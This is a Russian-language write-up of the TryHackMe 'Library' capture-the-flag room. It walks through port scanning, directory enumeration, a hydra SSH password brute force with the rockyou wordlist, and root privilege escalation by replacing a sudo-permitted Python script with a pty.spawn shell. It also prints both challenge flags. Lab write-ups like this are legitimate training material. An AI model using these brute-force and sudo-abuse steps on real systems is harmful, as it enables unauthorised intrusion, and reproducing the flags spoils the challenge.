Library - tryhackme

# Решение машины tryhackme / Library **Write-ups tryhackme / Library** [ссылка](https://tryhackme.com/r/room/bsidesgtlibrary) [связь со мной](https://t.me/iz_Witaly) ## Вводные данные * ip target 10.10.56.0 * ip host 10.10.168.43 * задание: прочитать user.txt и root.txt * использовать буду, встроенную в **tryHackme**, виртуальную машину **THM AttackBox** ## Разведка ### Сканирование портов #### masScan Устанавливаем masScan > apt install masscan > clear&&masscan 10.10.56.0 --rate=10000 -p1-65000 --ports U:1-65000 **Результат:** ~~~bash Discovered open port 22/tcp on 10.10.56.0 Discovered open port 80/tcp on 10.10.56.0 ~~~ #### nMap > clear&&sudo nmap 10.10.56.0 -p22,80 -sV -T4 -A ~~~bash PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) OS CPE: cpe:/o:linux:linux_kernel:3.13 ~~~ ### смотрим наличие эксплойтев на https://www.exploit-db.com/ * OpenSSH 7.2p2 2016-07-20 [OpenSSH 7.2p2 - Username Enumeration](https://www.exploit-db.com/exploits/40136) Remote Linux 2016-07-18 [OpenSSHd 7.2p2 - Username Enumeration](https://www.exploit-db.com/exploits/40113) Remote Linux result:***Возможен перебор паролей*** * Apache httpd 2.4.18 2023-04-01 [Apache 2.4.x - Buffer Overflow](https://www.exploit-db.com/exploits/51193) result:***Возможено переполнение буфера*** ### Web сайт #### Осмотр сайта(визуальный) * Найдены посты/коменты от пользователей 1. root 2. www-data 3. Anonymous 4. meliodas - более перспективный, тк он создал пост #### Поиск ссылок и каталогов ##### curl > clear&&curl http://10.10.56.0/ | grep -o '<a[^>]*>[^<]*</a>' | grep -o 'href="[^"]*"' | cut -d'"' -f2 ~~~ в тексте страницы нет явных ссылок ~~~ ##### dirB > dirb http://10.10.56.0 -r /usr/share/wordlists/dirb/common.txt ~~~ ==> DIRECTORY: http://10.10.56.0/images/ + http://10.10.56.0/index.html (CODE:200|SIZE:5439) + http://10.10.56.0/robots.txt (CODE:200|SIZE:33) + http://10.10.56.0/server-status (CODE:403|SIZE:298) ~~~ result: есть католог images/ в котором к изображения #### Открываем http://10.10.56.0/robots.txt ~~~ User-agent: rockyou Disallow: / ~~~ result: наверное намек на словарь [rockyou](https://github.com/Madhava-mng/RockYou.txt/blob/main/rockyou.txt.zip) ## Анализ * Есть 4 пользователя, 1 точно ведед блог * в вебе векторов не найдено * возможный намек на словарь rockyou **пробуем перебор паролей, по 1 пользователю чтобы экономить время** ## Взлом ### Скачиваем словарь создаем каталог и заходим с него > clear&&mkdir w&&cd w скачиваем словарь > clear&&wget https://github.com/Madhava-mng/RockYou.txt/raw/main/rockyou.txt.zip > unzip rockyou.txt.zip ### Перебор паролей - hydra > nano ~~~ meliodas ~~~ ctrl + o > user.txt ctrl + x > ls ~~~ user.txt rockyou.txt ~~~ > hydra -L user.txt -P rockyou.txt ssh://10.10.56.0 или > hydra -l meliodas -P rockyou.txt ssh://10.10.56.0 ~~~ [22][ssh] host: 10.10.56.0 login: meliodas password: iloveyou1 ~~~ ### Подключаемся по SSh > clear&&ssh meliodas@10.10.56.0 > meliodas@ubuntu:~$ ls bak.py user.txt > meliodas@ubuntu:~$ cat user.txt 6d488cbb3f111d135722c33cb635f4ec ### Повышени привелегий meliodas@ubuntu:~$ ls -l ~~~bash -rw-r--r-- 1 root root 353 Aug 23 2019 bak.py -rw-rw-r-- 1 meliodas meliodas 33 Aug 23 2019 user.txt ~~~ странный файл bak.py, изменить нельзя, но можно удалить > meliodas@ubuntu:~$ sudo -l ~~~bash (ALL) NOPASSWD: /usr/bin/python* /home/meliodas/bak.py ~~~ > meliodas@ubuntu:~$ rm bak.py ~~~bash rm: remove write-protected regular file 'bak.py'? y ~~~ > meliodas@ubuntu:~$ touch bak.py [](https://github.com/chikyukrish/TTY-Shell) > meliodas@ubuntu:~$ nano bak.py ~~~py import pty; pty.spawn("/bin/bash") ~~~ > meliodas@ubuntu:~$ sudo python /home/meliodas/bak.py > root@ubuntu:~# ls /root ~~~ root.txt ~~~ > root@ubuntu:~# cat /root/root.txt e8c8c6c256c35515d1d344ee0488c617